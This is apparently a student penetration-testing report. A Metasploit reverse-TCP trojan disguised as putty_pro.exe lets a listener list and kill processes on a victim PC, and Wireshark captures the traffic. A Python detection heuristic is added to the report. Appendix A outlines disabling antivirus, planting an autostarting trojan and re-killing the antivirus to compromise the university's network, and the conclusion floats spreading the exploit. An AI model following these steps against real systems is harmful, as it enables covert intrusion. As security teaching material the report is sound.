All of these tools are integrated deeply into the operating system, which makes them easy to use when testing a specified network. One can install some of these tools on other operating systems, but most of the tools listed here are designed to work best with Backtrack. Anyone who must take on the task of penetration testing a network is encouraged to use Backtrack Linux as the preferred operating system for doing so. Backtrack makes the use of these programs easy and straightforward, without the need to customize an operating system of choice in order to run them.

A further benefit of Backtrack is that it is easily installed onto a USB drive. Because Backtrack is based on Linux, its hardware requirements are not as demanding as those of a standard operating system. Backtrack can run on 512 megabytes of RAM and consumes only about 1 gigabyte of hard drive space. Because of these low requirements one can easily install Backtrack onto a USB drive and boot into the operating system from just about any computer on any network. This also means the operating system can allow someone with malicious intent to take down an enterprise system and destroy or compromise valuable data such as credit card information and private information such as social security numbers; with the advancements of GPS systems, one could even obtain location information if searching for someone with the intent to do bodily harm.

5.2 Testing Experiments

For all the test cases the preparation described in the previous sections has not changed: the attacking computer is already in the listening stage and the Wireshark computer is already sniffing.

The assumption is that all the directions given in the previous sections have been completed. The experiment needs three computers. The first is the computer running Backtrack and the exploit, with IP address 69.88.163.15. The next is the computer being attacked wirelessly, with IP address 69.88.163.240. The third computer runs Wireshark to sniff the wireless packets. These three computers are referred to as the exploit computer, the attacked computer and the Wireshark computer. They are all in their respective waiting stages, as shown in Figures 5.1-5.3. The exploit computer is listening at IP 69.88.163.15 on port 5001. The attacked computer is about to click on the putty_pro.exe application. Wireshark is capturing packets with the display filter “ip.src == 69.88.163.240 || ip.dst == 69.88.163.240”.

Figure 5.1: Exploit computer listening on IP 69.88.163.15 and port 5001.


Figure 5.2: Attacked computer, with application to be clicked.

Figure 5.3: Wireshark computer sniffing wireless packets with a filter in place.


The first step is to make a connection. The attacked computer clicks on the “putty_pro.exe” application. Once that has been done the exploit computer is connected, as shown in Figure 5.4. Wireshark then detects the connection, as shown in Figure 5.5.

Figure 5.4: Exploit computer makes the reverse TCP connection.


Figure 5.5: Wireshark computer sees the packets that make the connection.

Once the connection has been created one can call commands, all of which can be found in the Appendix or by typing “?” into the exploit computer. The first command used by the exploit computer is “ps”, as shown in Figure 5.6. The output shows all the processes running on the attacked computer. The attacked computer has no knowledge of this command being executed. Wireshark will capture the TCP packets transferred between the exploit computer and the attacked computer, as shown in Figure 5.7.


Figure 5.6: Exploit computer entering the “ps” command, showing all processes on the targeted computer.


Figure 5.7: Wireshark computer shows the TCP packets captured the moment after the “ps” command.


With the processes displayed on the exploit computer one can select a process ID to kill, as shown in Figure 5.8. The process that is going to be killed is 5040, which is Internet Explorer on the attacked computer, as shown in Figure 5.9. After typing “kill 5040” on the exploit computer, as shown in Figure 5.10, Internet Explorer on the attacked computer closes, as shown in Figure 5.11. Wireshark captures the TCP packets that are sent to execute the kill command, as shown in Figure 5.12. This is the end of the experiment.
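As an added example, not part of the original report, the following Python script applies the same selection as the Wireshark display filter from the experiment setup and then triages the captured sessions for the pattern that Figures 5.5 through 5.12 show: the attacked computer opening a long-lived connection to 69.88.163.15 on port 5001, with the exploit computer sending data first. The packet list, the set of "common" ports and the 198.51.100.10 and 10.0.0.x addresses are constructed assumptions, not data from the report's capture.

```python
from dataclasses import dataclass

ATTACKED = "69.88.163.240"   # attacked computer from Section 5.2
LISTENER = "69.88.163.15"    # exploit computer, listening on port 5001
# Ports a workstation is normally expected to open outbound sessions to (assumed list).
COMMON_SERVICE_PORTS = {22, 25, 53, 80, 110, 143, 443, 993, 995}

@dataclass(frozen=True)
class Packet:
    t: float        # capture time in seconds
    src: str
    sport: int
    dst: str
    dport: int
    flags: str      # TCP flags in Wireshark's letters: S, SA, A, PA, FA
    payload: int    # TCP payload length in bytes

# Constructed sample capture, not a real pcap: an ordinary web request from the
# attacked host, the reverse TCP session of the experiment, and an unrelated host.
CAPTURE = [
    Packet(0.00, ATTACKED, 49153, "198.51.100.10", 80, "S", 0),
    Packet(0.02, "198.51.100.10", 80, ATTACKED, 49153, "SA", 0),
    Packet(0.02, ATTACKED, 49153, "198.51.100.10", 80, "A", 0),
    Packet(0.03, ATTACKED, 49153, "198.51.100.10", 80, "PA", 412),
    Packet(0.10, "198.51.100.10", 80, ATTACKED, 49153, "PA", 1460),
    Packet(5.00, ATTACKED, 49160, LISTENER, 5001, "S", 0),      # putty_pro.exe is run
    Packet(5.01, LISTENER, 5001, ATTACKED, 49160, "SA", 0),
    Packet(5.01, ATTACKED, 49160, LISTENER, 5001, "A", 0),
    Packet(5.05, LISTENER, 5001, ATTACKED, 49160, "PA", 1460),  # listener talks first
    Packet(30.0, LISTENER, 5001, ATTACKED, 49160, "PA", 24),    # "ps" command
    Packet(30.1, ATTACKED, 49160, LISTENER, 5001, "PA", 3100),  # process list back
    Packet(95.0, LISTENER, 5001, ATTACKED, 49160, "PA", 28),    # "kill 5040" command
    Packet(95.1, ATTACKED, 49160, LISTENER, 5001, "PA", 40),
    Packet(10.0, "10.0.0.7", 40000, "10.0.0.8", 22, "S", 0),    # some other host
]

def display_filter(packets, host):
    """Same selection as the Wireshark filter  ip.src == host || ip.dst == host."""
    return [p for p in packets if host in (p.src, p.dst)]

def sessions(packets):
    """Group packets into TCP sessions keyed (initiator, port, responder, port);
    the initiator is whoever sent the bare SYN. Byte counts are seen from the
    initiator ("out" = initiator to responder); first_data says who spoke first."""
    found = {}
    for p in sorted(packets, key=lambda p: p.t):
        fwd = (p.src, p.sport, p.dst, p.dport)
        rev = (p.dst, p.dport, p.src, p.sport)
        if p.flags == "S":                   # a bare SYN opens a new session
            found[fwd] = {"start": p.t, "end": p.t, "out": 0, "in": 0, "first_data": None}
        elif fwd in found or rev in found:   # otherwise the SYN was never captured
            key = fwd if fwd in found else rev
            s, direction = found[key], "out" if key == fwd else "in"
            s["end"] = p.t
            s[direction] += p.payload
            if p.payload and s["first_data"] is None:
                s["first_data"] = direction
    return found

def reverse_connection_candidates(packets, host, min_seconds=60):
    """Heuristic for the pattern in Figures 5.5-5.12: the monitored host opens a
    session to a non-service port, it stays up, and the remote end sends data first
    (a staged Metasploit reverse TCP handler sends the stage on accept, and the
    operator's commands such as "ps" and "kill" then arrive the same way)."""
    hits = []
    for (initiator, _, responder, rport), s in sessions(packets).items():
        if initiator != host or rport in COMMON_SERVICE_PORTS:
            continue
        if s["end"] - s["start"] >= min_seconds and s["first_data"] == "in":
            hits.append((responder, rport))
    return hits
```

The heuristic only flags the 5001 session; the web session is excluded both by its port and because the attacked host sent data first, which is why a defender wants all three conditions rather than any one of them.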

Figure 5.8: Exploit computer selects the process to kill.


Figure 5.9: Attacked computer has Internet Explorer window open.

Figure 5.10: Exploit computer killing process ID 5040 (Internet Explorer).


Figure 5.11: Attacked computer showing that Internet Explorer was killed by the exploit computer.


Figure 5.12: Wireshark computer captured the packets moments after the kill command was executed.


6. Conclusion

Security assessment and analysis are complex concepts and require complex tools such as Backtrack, NMap, Metasploit, and Wireshark. NMap is a great tool for preliminary testing, such as finding a system to attack or just seeing what is on the network, but it does not offer much beyond a starting point. Wireshark is a similar tool, since it monitors packets over a network, wired or wireless. It won't directly tell anything, but it might alert users to a possible threat. Backtrack, with the Metasploit framework built in, is the bulk of the penetration testing, as it allows one to test and see, for example, whether one's antivirus is any good, among other things. Separately none of these tools would have been very useful, but together they allow for very practical applications.

The Metasploit exploit yielded success in allowing full control over the attacked computer. It also allowed the viewing of all running processes, and commands could then be used to kill selected processes. With this, other “hacks” may be performed, such as the one described in Appendix A, which may lead someone to try other exploits. The only limitation of Metasploit is the user's knowledge of the network and the systems running on it.

Wireshark yielded some success, but it did not tell much about the attack on the wireless computer. What it did show was a lot of communication between the two computers, as well as the fact that none of the TCP packets were transmitted at 100%, which should not be the case in a normal environment. To use Wireshark effectively one would have to have an in-depth understanding of the network and its behaviors; otherwise one would never gather useful information from all the packets.

Further advancement of this type of project would be to investigate the other exploits and perhaps find a way to spread the exploit to multiple computers quickly. NMap and Metasploit have more capabilities than those described in this project. Backtrack also supports other penetration testing tools, such as Aircrack-ng, which is used to crack WEP and WPA passwords. Furthermore, other tools, such as Nessus, could be added to expand the project.


Appendix A: Steps for performing a hack on FGCU’s network

As an exercise in checking security violation and protection, an attempt was made to check the vulnerability of Florida Gulf Coast University's enterprise network. The following actions were performed to prove the vulnerability.

Step one: Stopping the Antivirus on the targeted computer

This can be done with a couple of simple system calls from a C++ program. As proven by Chris Ruskai, writing a simple C++ program that suspends and disables the antivirus is possible. The code is not included in the report but was submitted separately to the instructor.

Step two: Placing Infected Program on the targeted computer

Create an exploit, as described in the previous section, which runs automatically, for example with the Java updater. This allows the attack to go completely unnoticed. Another way is to use the infected putty.exe, which automatically connects to another computer. Then shut down the computer.

Step three: Waiting for the connection between the attacking computer and the targeted computer.

Once the targeted computer is started, the Trojan will be launched and the listening attacking computer will then have complete access to the targeted computer.

Notes: Although this procedure will allow complete access to the targeted computer and its system, one only has about a 30-45 minute time slot before the antivirus will be automatically launched again over the network, because of the security procedure put in place over the enterprise network. If one studies the protection system well enough, once it launches again it can be killed from the Meterpreter before it removes the Trojan.


Figure A.1: Diagram of the Network


Appendix B: Exploit Commands

This Appendix includes screenshots of specific commands which are useful for performing an attack.

Figure B.1 Core Commands.

Figure B.2 File System Commands.

Figure B.3 Networking Commands.

Figure B.4 System Commands.

Figure B.5 User Interface Commands.

Figure B.6 Webcam Commands.

Figure B.7 Elevate Commands.

Figure B.8 Passwords Database Commands.

Figure B.9 Timestomp Commands.


Figure B.1 Core Commands.


Figure B.2 File System Commands.

Figure B.3 Networking Commands.


Figure B.4 System Commands.

Figure B.5 User Interface Commands.


Figure B.6 Webcam Commands.

Figure B.7 Elevate Commands.

Figure B.8 Passwords Database Commands.


Figure B.9 Timestomp Commands.


7. References

[1] Marsh, N. “NMap cookbook”, CreateSpace Independent Publishing Platform, Lexington, KY, August 2011

[2] Kennedy, D., O’Gorman, J., Kearns, D., and Aharoni, M. “Metasploit: The Penetration Tester’s Guide”, No Starch Press, San Francisco, 2011

[3] Gehring, J. “WireShark”, FGCU, 2011, URL: http://itech.fgcu.edu/faculty/zalewski/projects/files/WiresharkReport2011.pdf

[4] Steiner, C. “Metasploit”, FGCU, 2011, URL: http://itech.fgcu.edu/faculty/zalewski/projects/files/MetasploitReport2011.pdf

[5] Carestia, E. “NMap and SNORT”, FGCU, 2011, URL: http://itech.fgcu.edu/faculty/zalewski/projects/files/Nmap_and_SNORT_2011.pdf

[6] Wireshark, October 2012, URL: http://www.wireshark.org/

[7] Agle, M. “A Penetration Tester’s Toolkit”, Linux Journal, vol. 2012, no. 213, pp. 78-90, January 2012, URL: linuxjournal.com

[8] Mudge, R. “Live-fire security testing with Armitage and Metasploit”, Linux Journal, vol. 2011, no. 205, pp. 44-49, May 2011, URL: linuxjournal.com

[9] NMap User Documentation, 2012, URL: http://nmap.org/book/man.html

[10] WireShark Display Filters, October 2012, URL: http://wiki.wireshark.org/DisplayFilters

[11] Backtrack 5, 2012, URL: http://www.backtrack-linux.org/downloads